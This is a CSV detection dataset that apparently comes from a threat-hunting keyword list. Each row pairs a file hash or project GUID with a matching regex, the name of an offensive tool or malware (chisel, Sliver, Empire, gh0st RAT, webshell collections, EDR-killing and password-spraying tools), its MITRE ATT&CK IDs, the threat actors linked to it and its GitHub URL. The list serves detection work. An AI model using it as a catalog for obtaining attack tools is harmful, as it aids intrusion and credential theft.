"*019b542ddfc430bd0657e148450bec8b108b0d00686f961b5a6aab5db554fa82*",".{0,1000}019b542ddfc430bd0657e148450bec8b108b0d00686f961b5a6aab5db554fa82.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20743"
"*01a01a483466244ce6e6cfd3d03bdc40add8fa92ee435fefef1c4bb93fabd70c*",".{0,1000}01a01a483466244ce6e6cfd3d03bdc40add8fa92ee435fefef1c4bb93fabd70c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20744"
"*01a82d6612d5698da1badc96841f2d6835e26ee95af3c536411b6d1b086da811*",".{0,1000}01a82d6612d5698da1badc96841f2d6835e26ee95af3c536411b6d1b086da811.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#filehash","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","20746"
"*01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48*",".{0,1000}01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20747"
"*01ae8b32692998eefc9b050e189672ebbc6e356355fc5777957830fd8a067028*",".{0,1000}01ae8b32692998eefc9b050e189672ebbc6e356355fc5777957830fd8a067028.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#filehash","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","20748"
"*01b0e8b416acdd571719f15ae31beaa7ca2f363c3d674f4ba03261fd3d33fb3d*",".{0,1000}01b0e8b416acdd571719f15ae31beaa7ca2f363c3d674f4ba03261fd3d33fb3d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20750"
"*01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b*",".{0,1000}01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20753"
"*01C142BA-7AF1-48D6-B185-81147A2F7DB7*",".{0,1000}01C142BA\-7AF1\-48D6\-B185\-81147A2F7DB7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#GUIDproject","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","20754"
"*01c5865909e4e7737cc57397388405fcca18139b3da6845ecef11abbd89f4615*",".{0,1000}01c5865909e4e7737cc57397388405fcca18139b3da6845ecef11abbd89f4615.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20755"
"*01c79370958be0cd2c8c9dddd793556e37d0edf80f9ffd1f368c5440e5ef9666*",".{0,1000}01c79370958be0cd2c8c9dddd793556e37d0edf80f9ffd1f368c5440e5ef9666.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","20756"
"*01c856cd200bc91b6c8c6e7e11de385b34da4fb2789a497279910238e8dbe70a*",".{0,1000}01c856cd200bc91b6c8c6e7e11de385b34da4fb2789a497279910238e8dbe70a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","20757"
"*01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84*",".{0,1000}01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20758"
"*01ccc2ba607a0aa44e7bd6690dc5d93001ad70b03ad817142f7f9abb4c911abb*",".{0,1000}01ccc2ba607a0aa44e7bd6690dc5d93001ad70b03ad817142f7f9abb4c911abb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20759"
"*01cf2c956d813b4dddcde5f3349ada814764aa45d9579e8dde063c891f62d1d4*",".{0,1000}01cf2c956d813b4dddcde5f3349ada814764aa45d9579e8dde063c891f62d1d4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","20760"
"*01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3*",".{0,1000}01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","#filehash","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","20761"
"*01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce*",".{0,1000}01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20765"
"*01e17d1133dbcf9e6acd463f20f6a5b8a499f5ec8d728cdfea8c58df1085d1cc*",".{0,1000}01e17d1133dbcf9e6acd463f20f6a5b8a499f5ec8d728cdfea8c58df1085d1cc.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20766"
"*01eaa83c281f96c0669d3b898bb6ea2a89d00191eed047bd7db9527115ad1290*",".{0,1000}01eaa83c281f96c0669d3b898bb6ea2a89d00191eed047bd7db9527115ad1290.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20767"
"*01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1*",".{0,1000}01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20769"
"*02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292*",".{0,1000}02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","#filehash","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","20771"
"*0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092*",".{0,1000}0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20772"
"*0207936279f3e40608ea72aae76312c3e5485f6eabd041d5c690f485c523a795*",".{0,1000}0207936279f3e40608ea72aae76312c3e5485f6eabd041d5c690f485c523a795.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","20774"
"*02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b*",".{0,1000}02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20775"
"*020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45*",".{0,1000}020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20776"
"*0212bde3715a349a6b684dd54548638b5899be8d62a1e25559937e494e3cce54*",".{0,1000}0212bde3715a349a6b684dd54548638b5899be8d62a1e25559937e494e3cce54.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","20778"
"*02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6*",".{0,1000}02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20779"
"*021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79*",".{0,1000}021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","20780"
"*022781a00ae035eba4657733106f9d6909ec28f4bcd77b19a0ee215cb7766d85*",".{0,1000}022781a00ae035eba4657733106f9d6909ec28f4bcd77b19a0ee215cb7766d85.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20782"
"*0228336A-2F4C-0D17-2E11-86654A1FAD8D*",".{0,1000}0228336A\-2F4C\-0D17\-2E11\-86654A1FAD8D.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#GUIDProject","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","20783"
"*022E5A85-D732-4C5D-8CAD-A367139068D8*",".{0,1000}022E5A85\-D732\-4C5D\-8CAD\-A367139068D8.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#GUIDproject","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","20784"
"*022f86896e1a525969c4f067a241fce1e6435084d5cef6bc048adfdedc9df1de*",".{0,1000}022f86896e1a525969c4f067a241fce1e6435084d5cef6bc048adfdedc9df1de.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","20785"
"*0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f*",".{0,1000}0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20786"
"*023B2DB0-6DA4-4F0D-988B-4D9BF522DA37*",".{0,1000}023B2DB0\-6DA4\-4F0D\-988B\-4D9BF522DA37.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20788"
"*023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570*",".{0,1000}023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20789"
"*02456d3ccf24f0b89c47b9c9c406799462b7ca4b8405fca8f340a61ee275b7e6*",".{0,1000}02456d3ccf24f0b89c47b9c9c406799462b7ca4b8405fca8f340a61ee275b7e6.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","20790"
"*024c613cc354982252fc7e6e16cf1b0077bd005dd7eca9ec6ad489fadac1ac28*",".{0,1000}024c613cc354982252fc7e6e16cf1b0077bd005dd7eca9ec6ad489fadac1ac28.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20791"
"*024d01776b9b5d42efb6115f59ec51addab5e64db969f3ec9a564f242bf702f2*",".{0,1000}024d01776b9b5d42efb6115f59ec51addab5e64db969f3ec9a564f242bf702f2.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","20792"
"*025280A3-24F7-4C55-9B5E-D08124A52546*",".{0,1000}025280A3\-24F7\-4C55\-9B5E\-D08124A52546.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#GUIDproject","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","20794"
"*0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82*",".{0,1000}0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20795"
"*0254ddc9bb3533d56c1e0643d587088624faf2bf8eb4dd8f6d37c963cca75205*",".{0,1000}0254ddc9bb3533d56c1e0643d587088624faf2bf8eb4dd8f6d37c963cca75205.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20796"
"*02551940f2ee1ddd51aac5de97a84b5ce7a9fbec1be8f2c5018b2f7e09f7e1e9*",".{0,1000}02551940f2ee1ddd51aac5de97a84b5ce7a9fbec1be8f2c5018b2f7e09f7e1e9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20797"
"*0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621*",".{0,1000}0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20798"
"*0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f*",".{0,1000}0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","20799"
"*025c793845527566066af18172b76c87b234ad7306040cdf734ec516a6afda1c*",".{0,1000}025c793845527566066af18172b76c87b234ad7306040cdf734ec516a6afda1c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20801"
"*026389a44b0e1797d97afd0c333f778fe8c066e9edf4c0b847872263a27451f0*",".{0,1000}026389a44b0e1797d97afd0c333f778fe8c066e9edf4c0b847872263a27451f0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20803"
"*0266d99789720ec1a83a397127c478885b3f3ff02026a3fb06d3a10e523a9cc0*",".{0,1000}0266d99789720ec1a83a397127c478885b3f3ff02026a3fb06d3a10e523a9cc0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20804"
"*0269fd0001afa23edd1206484dccce04b49e0ec0daa65234126a6f3c42f35a46*",".{0,1000}0269fd0001afa23edd1206484dccce04b49e0ec0daa65234126a6f3c42f35a46.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#filehash","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","20805"
